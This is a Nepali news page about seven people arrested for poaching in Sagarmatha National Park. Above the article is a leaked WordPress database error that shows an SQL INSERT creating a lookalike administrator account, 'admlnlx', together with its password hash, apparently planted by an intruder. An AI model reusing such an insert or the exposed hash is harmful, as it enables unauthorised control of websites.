WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bchifx0.9A8dlBXqaybjvVQ/L6ByGZ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:06:20', '', 'admlnlx', 'admlnlx')
बैशाख २०, काठमाडौं – सगरमाथा राष्ट्रिय निकुन्ज भित्र वन्य जन्तुको सिकार गर्ने सात जनालाई शनिबार स्थानीयले पक्रेर इलाका प्रहरी कार्यालय नाम्चेमा बुझाएका छन् ।

फोर्चेमा १३ वर्षदेखि अस्थायी बसोबास गर्दै आएका स्थानीयको समेत संलग्न रहेको प्रहरीलाई गद्धृत गर्दै लाक्पा सोनाम शेर्पाले जानकारी दिएका छन् । सिकारमा पक्राउ परेकाहरूमाथि अनुसन्धान भइरहेको पनि शेर्पाले बताए ।